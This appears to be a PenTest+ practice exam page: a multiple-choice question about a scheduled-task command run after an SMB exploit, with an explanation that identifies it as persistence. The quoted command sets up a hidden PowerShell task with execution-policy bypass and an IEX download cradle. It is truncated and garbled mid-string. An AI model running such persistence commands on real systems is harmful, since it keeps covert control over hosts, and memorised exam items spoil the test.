PT0-003 Question #254: Real Exam Question with Answer & Explanation

Question

A tester obtained access to a computer using a SMB exploit and now has a shell access into the target computer. The tester runs the following on the obtained shell: schtask /create /tn Updates /tr "C:\windows\syswow64\Windows\WindowsPowershell\v1.0\powershell.exe hidden -NoLogo -NoInteractive -ep bypass -nop -c 'IEX ((new-object /ru System Which of the following does this action accomplish?

Options

• AUpgrades the shell performing a privilege escalation activity
• BUses the Windows Update service to move the shell connection and avoid detection
• CMaintains access into the compromised computer
• DForwards all the communication from the compromised host to the host 10.10.1.2

Explanation

Explanation

Option C is correct because schtasks /create creates a scheduled task (named "Updates" to blend in) that runs a PowerShell command with execution policy bypass - this is a classic persistence mechanism, ensuring the attacker regains access automatically even after a reboot or session termination. Option A is wrong because scheduled tasks don't inherently elevate privileges; privilege escalation requires exploiting specific vulnerabilities or misconfigurations, not just scheduling a task. Option B is incorrect because while the task is named "Updates" to mimic Windows Update activity, it does not actually use or interact with the Windows Update service in any way - it's simply camouflage. Option D is wrong because there is no port forwarding, tunneling, or redirection command in the syntax shown; forwarding traffic would require tools like netsh, socat, or SSH tunneling.

Memory Tip: Think "schtasks = Stay" - whenever you see schtasks /create in a post-exploitation context, the attacker's goal is to stay (persist) on the system. The disguised task name "Updates" is a red herring designed to fool you, but the function is always about maintaining that foothold.

No community discussion yet for this question.